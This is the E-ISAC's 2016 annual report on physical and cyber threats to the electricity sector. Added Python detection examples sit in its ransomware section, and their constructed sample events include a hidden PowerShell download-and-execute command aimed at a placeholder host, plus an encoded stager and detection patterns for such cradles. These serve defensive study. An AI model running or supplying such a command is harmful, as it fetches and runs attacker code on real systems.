
NERC | Report Title | Report Date I

E-ISAC End of Year Report

TLP: White

January 1–December 31, 2016

E-ISAC | E-ISAC End of Year Report | 2016 ii

Table of Contents

Overview
Chapter 1: E-ISAC Portal Activity
    Portal Enhancements
    E-ISAC Portal: A look at 2017
Chapter 2: Physical Security
    Overview
    Issues and Activities
Chapter 3: Cyber Security
    Reporting Overview
    Analysis and Activities
Chapter 4: CRISP
    Overview
Chapter 5: Programs and Engagement
    E-ISAC Products and Services
    E-ISAC Threat Workshop
    Grid Security Exercise (GridEx)
    Grid Security Conference (GridSecCon)
    Cross-Sector Activities
    E-ISAC Monthly Briefing Series Update
Chapter 6: Conclusion
    2017 Outlook
Appendix I


Overview

The Electricity Information Sharing and Analysis Center’s (E-ISAC’s) mission is to be a leading, trusted source that analyzes and shares electricity industry security information. The E-ISAC gathers security information, coordinates incident management, and communicates mitigation strategies with stakeholders within the electricity industry across interdependent sectors and with government partners. Throughout 2016, the E-ISAC collected, analyzed, and shared information on physical and cyber security issues, and this report is a review of the main issues covered over the year. The information came from open source reporting, electricity members, and federal partners and includes the E-ISAC’s analytical summary of those collective reports. This report looks at how the E-ISAC may further identify trends and patterns benefitting members.


Chapter 1: E-ISAC Portal Activity

In September 2015, the E-ISAC portal [1] underwent a significant transition from a limited content-management platform to a web application built around several cyber and physical threat collaboration capabilities for members. These capabilities improved the means by which the E-ISAC shares information with its members while also offering additional scaling and efficiencies. The portal continues to improve and gain new users; in 2016 alone, the E-ISAC registered 1,512 new portal users. Figure 1.1 shows how many views each type of post received.

Figure 1.1: Number of Views by Type of Post

The most viewed posts were documents, including the weekly reports and analytical assessments posted by the E-ISAC. In 2016, 1,525 unique users downloaded 713 different documents a total of 18,555 times. The most downloaded document of 2016 was the E-ISAC/SANS Ukraine Defense Use Case [2]. This 29-page report "summarizes important learning points and presents several mitigation ideas based on publicly available information on ICS incidents in Ukraine." Physical bulletins may have received fewer views for several reasons: fewer physical security users are active on the portal, fewer physical security events occurred, or fewer physical security incidents were reported. As the E-ISAC continues to collect portal activity data, that data will help the E-ISAC recruit new members to the portal and determine how it can best serve members' interests and needs.

[Figure 1.1 chart, View by Posting Type: Documents 16,070; Blogs 12,029; Cyber Bulletins 9,354; News 8,343; Physical Bulletins 4,373; Discussions 2,842; Events 52]

[1] https://www.eisac.com/
[2] https://www.eisac.com/Collaboration#/document/4185

Portal Enhancements

While the E-ISAC portal underwent significant changes in 2015, the E-ISAC continued to modify and improve functions during 2016. Earlier in the year, the E-ISAC led an effort to retire the North American Electric Reliability Corporation (NERC) legacy Critical Infrastructure Protection Information System, transferring approximately 400 users to using solely the E-ISAC portal for threat collaboration. In addition, the portal went through both functional and security reviews to assess key stakeholder areas and help inform portal strategy. The value and priority of nearer-term improvements factored in member input, and this involved discussions and demonstrations with Electricity Subsector Coordinating Council (ESCC) working group members, including the Member Executive Committee (MEC). From these discussions, the E-ISAC delivered enhancements in 2016, such as:

Collaboration Facility:
- Adding a dashboard with current E-ISAC reports and member requests for information
- Improving posting, sorting, and filtering
- Updating the posting listings layout
- Updating the portal user guide [3]

Sharing Functions:
- Allowing members to export indicators into comma-separated value files after posting
- Offering the option to post to "E-ISAC Staff" only for very sensitive Traffic Light Protocol (TLP): RED posts
- Allowing E-ISAC staff to edit E-ISAC posts without generating extra notification traffic
- Automatically checking the boxes of the available recipients for a chosen TLP color sensitivity
- Displaying information about the selected document types during post creation
- Improving the email notification format
- Providing easier access from external reference links to portal content

Security:
- Instituting a required 90-day password refresh, including advance notification and a lock-out sequence
- Adding other security improvements

E-ISAC Portal: A look at 2017

The E-ISAC will continue to implement smaller, discretionary improvements on the current portal and, in 2017, may select and migrate toward a more mature and capable platform solution.

[3] https://www.eisac.com/Content/attachments/help_manual.pdf


Chapter 2: Physical Security

Overview

E-ISAC physical security analysts capture, analyze, and disseminate physical security incidents reported by electricity industry members to fellow E-ISAC members, law enforcement, and government agencies. The information is disseminated in a non-attributed format and is valuable for ongoing situational awareness, detection, and prevention of similar incidents. The physical security analysts also provide reporting and analysis on sector-relevant global incidents. Gathering more shared physical security information became an increased priority in 2014, which improved analysis and actionable sharing on the portal.

Trends and Analysis

Members reported 174 physical security incidents to the E-ISAC physical security analysts in 2016: 93 in the first half of the year and 81 in the second half. This difference is minor and may indicate a more stable reporting rate than in 2015, when reporting increased significantly in the second half of the year. The physical security analysts reviewed the reports from all segments of the industry by month, region, and event type. The analysts also examined a more detailed regional breakdown of reports and monitored trends including copper theft and surveillance.

Regional Analysis

The Regional Entities include members from all segments of the electric industry, including investor-owned utilities, federal power agencies, rural electric cooperatives, state, municipal, and provincial utilities, independent power producers, power marketers, and end-use customers. Members from the Western Electricity Coordinating Council (WECC), SERC Reliability Corporation (SERC), and Northeast Power Coordinating Council (NPCC) Regions reported the highest number of events to the E-ISAC (see Figure 2.1). Over 25 percent of both WECC and SERC members reported directly to the E-ISAC, which signifies an increase in voluntary reporting from those Regions over 2015. Overall, 22 percent of the incidents were reported to the E-ISAC directly; the other sources were the Reliability Coordinator Information System (RCIS), U.S. Department of Energy OE-417 disturbance reports, and NERC EOP-004 event reports. While the E-ISAC does not have sufficient data from 2015 to accurately compare the two years, the analysts assessed a slight increase in direct reports. These direct reports were often phone calls during incident response, emails sharing details such as pictures and law enforcement engagement, or members voluntarily posting incidents to the E-ISAC portal. The physical security analysts' outreach efforts and timely bulletins to industry were pivotal in creating a trusted environment for voluntary sharing, and the E-ISAC benefited from regular correspondence with security managers throughout the Regions.


Figure 2.1: Regional Breakdown of Physical Security Incidents

Trends

The analysts reviewed events by overall type using the following categories: gunfire, intrusion, surveillance, suspicious activity, theft, threat, vandalism, and other. Incidents that fell into multiple categories were categorized based on the intent of the action. See Figure 2.2.

Figure 2.2: Breakdown of Physical Security Incidents

Activities falling under “Gunfire” and “Suspicious Activity” were the most prominent event types in 2016. Gunfire incidents have been a regular occurrence throughout the sector, and SERC and WECC had the most gunfire-related incidents. Security managers commented that gunfire damage is often only discovered during routine inspections because they do not typically cause enough damage to trigger immediate action. Most gunfire incidents occurred at substations in remote areas and were reported to be caused by local hunters or youth.

[Figure 2.1 chart: Security Incidents by Region; per-Region counts are not reproduced in the text]

[Figure 2.2 chart, Type of Incidents 2016: Gunfire 21%; Suspicious Activity 21%; Intrusion 18%; Theft 16%; Surveillance 13%; Threat 5%; Vandalism 5%; Other 1%]


Copper Theft

In 2016, the E-ISAC received 27 reports of theft, and over 70 percent of these incidents involved copper. More than half of these incidents occurred in the WECC Region. Figure 2.3 shows copper theft by month, with no noticeable trend. However, the price of copper increased 24 percent in 2016, which may trigger more copper theft incidents in 2017.

Figure 2.3: Copper Theft Trends

Surveillance

Members reported 23 incidents involving surveillance. These often involved photography, unmanned aircraft system (UAS) flyovers, vehicle drive-bys, and social engineering. Incidents involving surveillance are often considered a "non-event," as members of the public often enjoy taking photographs of infrastructure. However, these reports are integral to creating an accurate threat picture: surveillance may precede follow-on criminal activity ranging from copper theft to vandalism, or even an attack on the facility itself, so reporting it helps entities prepare. These reports are often provided voluntarily to the E-ISAC because they do not always meet mandatory reporting criteria.

Issues and Activities

During 2016, the physical security analysts provided coverage of national and international security-related events, emerging threats, and international terrorism trends. National trends of interest in 2016 included UAS incidents, and international interest focused on terrorist activities impacting or potentially impacting North America.

UAS

Throughout 2016, the electricity industry discussed UAS regularly because they are a present and relevant security threat to industry. The E-ISAC collects UAS incident data to provide a threat picture to its members. In early 2016, the E-ISAC published a threat bulletin update on UAS [4]. Current federal statutes and regulations provide for limited enforcement of UAS use within the National Airspace System. In August 2016, the Federal Aviation Administration (FAA) hosted an information session on reporting and legislative updates. The E-ISAC provided this information to members via weekly reports and monthly member briefings. The E-ISAC requests that members continue to report UAS incidents, surveillance, and other suspicious activity to both the E-ISAC and the FAA to help provide a more complete and accurate threat picture. Local FAA reporting information is available on the portal.

[4] https://www.eisac.com/Collaboration#/document/4114



Terrorist Activities

During 2016, the E-ISAC closely followed terrorist activities impacting North America. None of these activities affected the operation of the electric grid, but keeping members aware of terrorist tactics, techniques, and procedures (TTPs) is important to understanding and mitigating threats. The E-ISAC tracked activities of Al Qaeda in the Arabian Peninsula (AQAP) and the Islamic State of Iraq and the Levant (ISIL). In November 2016, AQAP published the 16th edition of Inspire, an online propaganda magazine that discusses ways in which individuals can conduct terrorist activities. The magazine has historically mentioned targeting critical infrastructure, which is why members should be aware of the content of these types of publications. A safe download of the magazine is available on the E-ISAC website [5]. Also in November, the E-ISAC tracked the attack at Ohio State University, where an attacker used TTPs commonly associated with ISIL: vehicle ramming and a knife attack in a heavily populated area on campus. Not surprisingly, these TTPs are mentioned in the AQAP publication. ISIL later claimed responsibility for the Ohio State University attack. As a result of that attack, the E-ISAC physical security analysts released a product discussing the use of these TTPs and mitigation strategies. E-ISAC analysts believe the use of these TTPs will only increase, and therefore awareness, vigilance, and countermeasures are critical in protecting against these threats.

Physical Security Advisory Group (PSAG)

The PSAG has 22 members comprising senior security leaders and observers from industry and government who together possess over 600 years of experience. The E-ISAC leads and facilitates the PSAG, which advises industry on threat mitigation strategies to enhance bulk power system physical security and reliability. The PSAG develops products for industry that focus on security operational plans, policies and procedures, evolving security technologies, training, incident response and management, and more. In 2016, the PSAG continued work on initiatives and documents such as the Enhanced Background Screening initiative, the Design Basis Threat document, Security Management in the Electricity Sub-Sector, a white paper on transmission line corridor security, and UAS research. The group enhanced these products through regular coordination with the Department of Homeland Security (DHS) and the Department of Energy (DOE). Finally, in December 2016, the PSAG worked with DOE, Pacific Northwest National Laboratory, and DHS to update the Design Basis Threat document for the current threat landscape. The revised document will be posted on the E-ISAC portal in early February 2017.

Physical Security: A look into 2017

The E-ISAC encourages its members to report all activities or observations that appear out of the ordinary; reporting helps the team discover patterns and assess the overall threat picture across the continent. Accurate trend analysis is impossible without sufficient data. E-ISAC physical security analysts continue to reach out to members by presenting physical security threat information to Regions on request and discussing trends with them. This outreach fosters relationships with security staff and demonstrates the value of the reports they share. Regions that provide more direct reporting benefit from a more accurate view of incidents and any possible connections between them. The physical security analysts welcome suggestions for expanding analytic capabilities and industry outreach. Email suggestions or requests to [email protected].

[5] https://www.eisac.com/collaboration#/blog/5499


Chapter 3: Cyber Security

Reporting Overview

The E-ISAC continues to share relevant cyber security information with its members via the E-ISAC portal. This year, 241 cyber bulletins were posted to the portal; of these, 210 were based on information provided by members or were posted by members themselves. This is consistent with the 218 cyber bulletins in 2015, and the E-ISAC hopes to see the number increase in 2017 as member participation grows. The E-ISAC also posted several bulletins based on information from government partners and trusted open source partners. As in 2015, the second quarter (Q2) of 2016 saw the most portal posts based on member-provided information.

Analysis and Activities

Just under half of the reports from members involved phishing incidents. Other important trends and analysis conducted throughout the year focused on the Dridex campaign, ransomware, and the Internet of Things (IoT). The E-ISAC also monitored several important cyber events in 2016, including Russian malicious cyber activity and a power outage in Ukraine.

Phishing

In 2016, over 40 percent of the cyber bulletins posted were about phishing, consistent with what the E-ISAC observed in 2015 (see Figure 3.1). The reported phishing emails were tied to the Dridex campaign, HTML credential harvesting, Gh0st RAT, Locky, typosquatting, whaling, and Vawtrak attempts. Phishing is expected to remain a prevalent delivery method for cyber-attacks. End-user training and email monitoring technology are ways that members can combat this threat.

Phishing Themes Reported in 2016

* Scanned Document * Wire transfer * Social Security * Letter Response * New Order * Quicken Bill * Contest winner * Visa Rewards * Invoice * AMEX * Remittance * Emailed Invoice * Payroll * FedEx * debt collection notice * Docusign * Account Terminated * AW: New Order * Tax Invoice * Updated Agreement * Dispatched Purchase Order * meeting * Amazon * Order delivery before 21st July * Sign the Document * The Office of The Attorney General Complaint * Integrated Control Systems * General Liability & Workers Compensation Insurance * Suspicious activity on your PayPal Account * Re: order delay * Disabled account threat * Good news everyone * Property Offer * Healthy Living * Word Document * IT Service * Google Doc *Law Suit 1808.* charge on my card * WE RECEIVED INVALID CREDETIALS FROM YOU - UPGRADE NOW * Accounts Documentation: Invoices * Voicemail from Anonymous * yourlifeupdateinfo * Office 365 * File from a Dropbpox user * you have 1 important update at your message center * important Message to Avoid Temporary Block on Your Card

[Figure 3.1 chart, Cyber Bulletins: Phishing 41%; Other 59%]

Figure 3.1: Phishing Cyber Bulletins


NERC Alert

On February 9, 2016, the E-ISAC provided subject matter expertise to develop the NERC alert "Mitigating Adversarial Manipulation of Industrial Control Systems as Evidenced by Recent International Events." The alert shared techniques observed in the attacks on Ukraine in December 2015: spear phishing, credential harvesting and lateral movement, unauthorized remote access, telephony denial of service, and sustained persistent access. Most of these same tactics and techniques were used in a subsequent series of attacks against Ukraine in December 2016. Several options exist for remediation and prevention of the techniques used against Ukraine:

- Spear phishing with malicious attachment: disable macros in Microsoft Office productivity software. Recurring training in recognizing and reacting to social engineering attempts is also vital.

- Credential harvesting: instituting password length and change requirements, together with domain controller and privileged account monitoring, may reduce the chance of successful credential harvesting.

- Lateral movement and remote access: implement least privilege, separation of duties, and layered network segmentation, and monitor privileged accounts and the use of remote administrative tools (e.g., PowerShell, Sysinternals).

Dridex Campaign

Several cyber bulletins and discussions in March related to Dridex, a financial trojan that steals banking credentials. Multiple members reported a phishing campaign comprising thousands of emails, each carrying a macro-enabled attachment. Members shared over 70 indicators connected to the campaign, including methods to automatically detect the malicious attachments from their distinctive file naming conventions.

Ransomware

Since the beginning of 2016, E-ISAC reporting and media coverage pointed to a significant increase in ransomware-specific cyber extortion activity. Ransomware is a class of disruptive, malicious software designed to deny access to data and files until the victim meets payment demands. Once compromised, the victim may have to restore systems from backups or pay the ransom in the hope of regaining access to the data and files. In response to the prevalence of ransomware across all critical sectors and its destructive capabilities, the E-ISAC provided subject matter expertise for a NERC alert issued in June 2016 [6]. The E-ISAC also released a detailed assessment [7] on May 11, 2016, outlining the evolution of ransomware tactics. This assessment provides:

- a threat assessment and outlook centered on the electricity industry;
- a brief technical background and context for ransomware;
- observed activity specific to the electricity industry; and
- recommended mitigation options.

The E-ISAC is aware of at least one case in 2016 in which ransomware included industrial control system themes and delivered malicious payloads. From an attacker’s perspective, a successful attack on critical operational technologies may yield an exceptionally high ransom and an increase in likelihood of the ransom being met.

[6] https://www.eisac.com/collaboration#/news/4640
[7] https://www.eisac.com/collaboration#/document/4520


In April 2016, a ransomware attack hit the Lansing Board of Water and Light's (BWL) corporate network. The attack forced BWL to shut down its accounting system and email services for about 250 employees; phone services also went down, but customer data remained secure. Additionally, 62 Cybersecurity Risk Information Sharing Program (CRISP) investigations stemmed from ransomware indicators, resulting in 10 CRISP all-site reports. The E-ISAC assesses with medium confidence that extortion tactics will increase across all sectors and that ransomware may become the financially motivated malware of choice, surpassing banking credential harvesting.

PowerShell

Ransomware based on the Windows PowerShell scripting language, dubbed "PowerWare" by researchers when it emerged in the spring of 2016, is now common. Although new to ransomware, the malicious use of interpreters and compilers already present on victim systems dates back to the C compiler on systems in the 1980s; during the 1990s it was common to remove compilers from production servers to combat their malicious use. Ransomware is often delivered via macro-enabled Microsoft Office documents: the embedded macro spawns PowerShell in the background, invisibly to the user, and PowerShell then downloads and executes the PowerWare code. Various options available at run-time to PowerShell are shown in Figure 3.2 below.

Figure 3.2: Windows PowerShell

Early versions of PowerWare, a component of the larger Cryptolocker ransomware threat that became prevalent in 2015, were defeated by recovering the keys used to encrypt the victim system's files with a network analyzer such as Wireshark, because the keys were transmitted in cleartext to one of several command-and-control systems. System backups are only a partial remedy because ransomware variants can also attack unmapped network drives and cloud-based assets that may not be included in backup routines. In 2017, the E-ISAC will continue to monitor this threat and provide relevant and timely information and updates to members.
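The Office-to-PowerShell delivery chain described above is also the most reliable place to detect it, and it is where the NERC alert's advice to monitor the use of remote administrative tools such as PowerShell applies in practice. The following added example, written for this page and not E-ISAC code, flags any script host launched by an Office application and adds a reason for each stager trait found on the command line. The record field names (ParentImage, Image, CommandLine, User) are assumptions about how a Sysmon Event ID 1 or Windows 4688 feed arrives in your log pipeline, and the sample events are constructed.

```python
"""Flag PowerShell (or another script host) launched by an Office application,
the delivery chain described for PowerWare above.

Added example, not E-ISAC code. Input records are constructed and shaped like
Sysmon Event ID 1 / Windows Security 4688 process-creation events; the field
names (ParentImage, Image, CommandLine, User) are assumptions about how your
log pipeline presents them.
"""
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# Switches and cradles that a macro-launched PowerShell stager tends to use.
# Each match adds a reason to the alert; the parent/child pair alone is enough
# to alert, because Office has no routine reason to start a script host.
SUSPICIOUS = [
    (re.compile(r"-(?:e|ec|enc|encodedcommand)\b", re.I), "encoded command"),
    (re.compile(r"-(?:w|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"-(?:nop|noprofile)\b", re.I), "no profile"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient",
                re.I), "download cradle"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "invoke-expression"),
]


def basename(path):
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(event):
    """Return an alert dict for an Office -> script host event, else None."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return None
    cmd = event.get("CommandLine", "")
    reasons = [f"{parent} spawned {child}"]
    reasons += [label for pattern, label in SUSPICIOUS if pattern.search(cmd)]
    # The parent/child pair plus at least two stager traits is rated high;
    # a bare Office -> script host launch is still worth a medium alert.
    severity = "high" if len(reasons) >= 3 else "medium"
    return {"user": event.get("User", "?"), "severity": severity,
            "reasons": reasons, "command": cmd}


def scan(events):
    """Run score_event over a sequence of events and keep the alerts."""
    return [alert for alert in map(score_event, events) if alert]


# Constructed sample events (not real telemetry). 203.0.113.10 is a
# documentation address standing in for a stager download host.
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"User": "CORP\\alice", "ParentImage": OFFICE + r"\WINWORD.EXE", "Image": PS,
     "CommandLine": "powershell.exe -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"User": "CORP\\bob", "ParentImage": OFFICE + r"\EXCEL.EXE", "Image": PS,
     "CommandLine": r"powershell.exe -File C:\Users\bob\Documents\refresh.ps1"},
    {"User": "CORP\\carol", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe"},
    {"User": "CORP\\dave", "ParentImage": OFFICE + r"\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe", "CommandLine": "splwow64.exe 12288"},
    {"User": "CORP\\erin", "ParentImage": OFFICE + r"\OUTLOOK.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://203.0.113.10/a')\""},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["severity"].upper(), alert["user"], "; ".join(alert["reasons"]))
```

Run against the constructed events, the Word and Outlook launches come out high (encoded, hidden, policy-bypass and download-cradle traits), the Excel launch of a local script comes out medium, and the Explorer launch and the Word print spooler child are ignored. The parent/child rule is the durable part; the flag patterns are the part attackers change, so treat them as enrichment rather than as the trigger.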


IoT

Serious concerns surround the security of devices designed to be used as part of the IoT. Cyber security practitioners generally agree that most internet-connected IoT devices are likely targets because security is generally not an important part of their design process. Because the IoT is highly interconnected and largely unauthenticated, the lack of sufficient security design in consumer products and toys can be leveraged against critical systems that are reachable from the internet. Large numbers of IoT devices can be harnessed from all areas of the internet rather than from a small number of networks, and at this scale they have generated attack throughput on the order of several hundred megabits per second to one terabit per second (Tbps) or more. The October 21, 2016, distributed denial of service (DDoS) attack against the Dyn-managed domain name system (DNS) infrastructure directed 1.2 Tbps of network throughput (also referred to as "bandwidth") against the DNS provider's infrastructure. Malware such as Mirai will continue to grow, with the overall throughput of internet providers' infrastructure the ultimate limiting factor. A Level 2 NERC alert published on October 11, 2016, addressed issues with IoT devices connected to the public internet; additional information concerning the alert is available to members at the TLP: AMBER level [8]. On October 24, 2016, the E-ISAC released its Internet of Things DDoS White Paper in conjunction with the Level 2 NERC alert. In late 2016, existing attack surfaces and new malware payloads were exploited in unique ways using custom attack software. The attacks highlight the scale of network bandwidth that can be unleashed upon connected systems, with multiple attacks generating over one Tbps.

CRISP data gave the E-ISAC further insight. After the IoT DDoS activity in October, CRISP participants saw a significant increase in scanning activity on ports 23 (Telnet), 2323 (alternate Telnet), and 7547 (TR-069 CWMP), the ports attributed to the recent IoT (Mirai) DDoS activity. Change in record counts since October 2016:

- Port 23: ~8 billion records increased to ~40 billion
- Port 2323: ~6 million records increased to ~6 billion
- Port 7547: ~12 million records increased to ~2.5 billion

The E-ISAC developed recommendations for defensive capabilities in the electricity industry with suggestions to improve the overall posture of network security and cyber security within its community. The document is available for download on the E-ISAC portal [9].
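The port figures above are a before/after comparison of record counts per destination port. The following added example, which is not E-ISAC or CRISP code, performs that comparison on a constructed flow log: it counts records per port in a baseline window and a current window, reports the ratio and percentage change for ports that surged, and annotates the ports tied to Mirai-era IoT scanning. The CSV layout (timestamp,src,dst,dport,proto), the window dates, and the generated records are assumptions made for the example.

```python
"""Per-destination-port volume comparison between a baseline window and a
current window, flagging ports whose count jumped, which is the shape of the
CRISP port 23/2323/7547 observation above.

Added example, not E-ISAC or CRISP code. The flow record layout
(timestamp,src,dst,dport,proto as CSV) is an assumption; the records are
generated locally from documentation address ranges and are not real data.
"""
import csv
import io
from collections import Counter
from datetime import datetime, timedelta

# Ports associated with the Mirai-era IoT scanning the report describes.
IOT_PORTS = {23: "telnet", 2323: "telnet (alternate)", 7547: "TR-069/CWMP"}


def make_flows():
    """Build a constructed CSV flow log: a quiet September baseline and a
    post-October window in which telnet and TR-069 probing surges."""
    rows = ["timestamp,src,dst,dport,proto"]

    def add(day0, port, n):
        for i in range(n):
            ts = day0 + timedelta(hours=i * 7 % 24, minutes=i * 13 % 60)
            rows.append(f"{ts.isoformat()},203.0.113.{(i * 37) % 250 + 1},"
                        f"198.51.100.10,{port},tcp")

    base, cur = datetime(2016, 9, 3), datetime(2016, 11, 3)
    for port, n in ((23, 4), (2323, 1), (7547, 1), (443, 10)):
        add(base, port, n)
    for port, n in ((23, 20), (2323, 9), (7547, 12), (443, 11), (22, 2)):
        add(cur, port, n)
    return "\n".join(rows) + "\n"


def count_by_port(csv_text, start, end):
    """Count records per destination port with start <= timestamp < end."""
    counts = Counter()
    for row in csv.DictReader(io.StringIO(csv_text)):
        ts = datetime.fromisoformat(row["timestamp"])
        if start <= ts < end:
            counts[int(row["dport"])] += 1
    return counts


def pct_change(before, after):
    """Percentage change, or None when there is no baseline to compare to."""
    return None if before == 0 else (after - before) * 100.0 / before


def port_surges(baseline, current, min_ratio=3.0, min_records=3):
    """Ports whose current count is at least min_ratio times the baseline.
    A port absent from the baseline counts as an unbounded increase; tiny
    current counts are ignored so one-off probes do not alert."""
    surges = []
    for port in set(baseline) | set(current):
        before, after = baseline.get(port, 0), current.get(port, 0)
        if after < min_records:
            continue
        ratio = float("inf") if before == 0 else after / before
        if ratio >= min_ratio:
            surges.append({"port": port, "baseline": before, "current": after,
                           "ratio": ratio, "pct_change": pct_change(before, after),
                           "iot": IOT_PORTS.get(port)})
    return sorted(surges, key=lambda s: -s["current"])


def analyse(csv_text):
    """Compare a September baseline with a November window (assumed dates)."""
    baseline = count_by_port(csv_text, datetime(2016, 9, 1), datetime(2016, 10, 1))
    current = count_by_port(csv_text, datetime(2016, 11, 1), datetime(2016, 12, 1))
    return port_surges(baseline, current)


if __name__ == "__main__":
    for s in analyse(make_flows()):
        print(f"port {s['port']:>5} {s['baseline']:>4} -> {s['current']:>4}"
              f"  x{s['ratio']:.1f}  {s['iot'] or ''}")
```

On the constructed data the three IoT ports surface in descending order of current volume (23, 7547, 2323) while 443 stays flat and the two stray SSH records fall under the minimum. The min_records floor matters at real scale: a port that goes from 0 to a handful of records is noise, and a port that goes from millions to billions is the finding.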

GRIZZLY STEPPE

On December 29, 2016, DHS and the Federal Bureau of Investigation (FBI) released a Joint Analysis Report (JAR) titled "GRIZZLY STEPPE - Russian Malicious Cyber Activity," which provided details of the tools used by Russian intelligence services to compromise and exploit networks and endpoints associated with the United States election as well as a range of U.S. government, political, and private sector entities. The JAR also included recommended mitigations and information on how to report such incidents to the U.S. government. The E-ISAC analyzed the indicators of compromise (IOCs) provided by government intelligence for potential malicious network traffic that might affect the electricity industry.

[8] https://www.eisac.com/collaboration#/cyberBulletin/5275
[9] https://www.eisac.com/Collaboration#/document/5365


On December 30, 2016, The Washington Post published an article alleging that a utility had been infiltrated by "the Russian military and civilian services." The report linked an Internet Protocol address referenced in the FBI/DHS Joint Analysis Report to activity observed by a utility; the address in question was included in the list of IOCs. The initial article reported incorrectly that the electric grid had been penetrated through a Vermont utility. Burlington Electric Department released a statement indicating that the potentially compromised laptop had not been connected to the grid, and The Washington Post subsequently corrected its article. The utility's further analysis and investigation determined that the incident was not linked to any effort by the Russian government to target or hack the utility. Based on the information currently available, the E-ISAC believes that neither the electricity industry nor this particular utility was targeted by this cyber-attack; the information points to activity that was part of a broader, untargeted campaign searching for vulnerable computers to exploit. Both the wide range in age of the indicators in question and the fact that the addresses belonged to content providers, cloud computing providers, and internet service providers as well as private companies and individuals made it difficult to substantiate any activity as belonging to a particular actor.
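The Burlington Electric episode shows why a raw IP-indicator hit needs context before it is read as targeting: an indicator that is years old, or that points at a content provider, cloud or ISP address, matches a great deal of benign traffic. The following added example, which is not E-ISAC or DHS/FBI code, matches a short list of IP and CIDR indicators against proxy log lines and labels each hit with a confidence derived from the indicator's age and the type of owner of the address. The indicator fields (value, first_seen, owner_type), the log line format, and the documentation-range addresses are all constructed for this example.

```python
"""Match IP indicators (the kind a JAR ships) against web proxy log lines and
rate each hit by indicator context, so that a hit on an old indicator or on
shared infrastructure (CDN, cloud, hosting, ISP space) is reported as
low-confidence rather than as evidence of targeting.

Added example, not E-ISAC or DHS/FBI code. The indicator fields
(value, first_seen, owner_type), the log line layout and the addresses
(documentation ranges) are all constructed for this example.
"""
import ipaddress
import re
from datetime import date

SHARED_OWNERS = {"cdn", "cloud", "hosting", "isp"}
AS_OF = date(2016, 12, 30)  # assumed date of the analysis

INDICATORS = [
    {"value": "198.51.100.7", "first_seen": date(2016, 11, 20), "owner_type": "dedicated"},
    {"value": "192.0.2.44", "first_seen": date(2013, 1, 1), "owner_type": "cdn"},
    {"value": "203.0.113.0/24", "first_seen": date(2014, 3, 1), "owner_type": "hosting"},
]

# Constructed proxy lines: time client server port method url
PROXY_LOG = """\
2016-12-30T09:14:02Z 10.1.5.23 198.51.100.7 443 CONNECT 198.51.100.7:443
2016-12-30T09:15:11Z 10.1.5.23 198.51.100.200 443 CONNECT 198.51.100.200:443
2016-12-30T10:02:45Z 10.1.7.9 192.0.2.44 80 GET http://192.0.2.44/static/app.js
2016-12-30T11:30:00Z 10.1.9.14 203.0.113.55 80 GET http://203.0.113.55/
"""
LINE = re.compile(r"^(\S+) (\S+) (\S+) (\d+) (\S+) (\S+)$")


def build_index(indicators):
    """Parse indicator values into networks (a bare address becomes a /32),
    longest prefix first so a host indicator beats a covering netblock."""
    nets = [(ipaddress.ip_network(i["value"], strict=False), i) for i in indicators]
    return sorted(nets, key=lambda pair: -pair[0].prefixlen)


def lookup(index, ip_text):
    """Return the first (most specific) indicator containing ip_text."""
    addr = ipaddress.ip_address(ip_text)
    for net, indicator in index:
        if addr in net:
            return indicator
    return None


def confidence(indicator, as_of):
    """Dedicated, recently seen infrastructure is worth chasing; shared or
    stale indicators mostly produce coincidental hits."""
    age_days = (as_of - indicator["first_seen"]).days
    if indicator["owner_type"] in SHARED_OWNERS or age_days > 365:
        return "low"
    return "high" if age_days <= 180 else "medium"


def match_logs(log_text, indicators, as_of):
    """Scan proxy lines; return one hit per line whose server matches."""
    index = build_index(indicators)
    hits = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ts, client, server = m.group(1), m.group(2), m.group(3)
        indicator = lookup(index, server)
        if indicator is None:
            continue
        hits.append({"time": ts, "client": client, "server": server,
                     "indicator": indicator["value"],
                     "confidence": confidence(indicator, as_of)})
    return hits


if __name__ == "__main__":
    for hit in match_logs(PROXY_LOG, INDICATORS, AS_OF):
        print(hit["confidence"].upper(), hit["time"], hit["client"], "->",
              hit["server"], "matched", hit["indicator"])
```

Of the three hits, only the connection to the recently listed dedicated host is rated high; the CDN address and the old hosting netblock are low, which is the reading the report gives the Vermont laptop traffic. An IP-only indicator list carries no port, URL or timing, so the confidence here is a triage order, not a verdict; the next step is the host-side check that Burlington Electric performed.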

Ukraine

From late on December 17, 2016, into the early hours of December 18, 2016, Ukraine's state-owned national power company Ukrenergo experienced an outage at an electrical substation in the northern part of the capital city of Kyiv. Service was restored through manual operator intervention. According to open source reporting, the acting Chief Director of Ukrenergo indicated that the outage was initially deemed the result of a cyber-attack. Researchers subsequently confirmed, during a presentation10 at the S4x17 conference on January 11, 2017, that the outage resulted from operations at the end of a protracted campaign that began December 6 and lasted through December 20. This campaign included remote access and denial-of-service attacks against systems belonging to the transportation, energy, and government sectors in Ukraine. Investigators indicated that members of "several cybercriminal groups" had collaborated on the attack.

Cyber Security: A Look into 2017

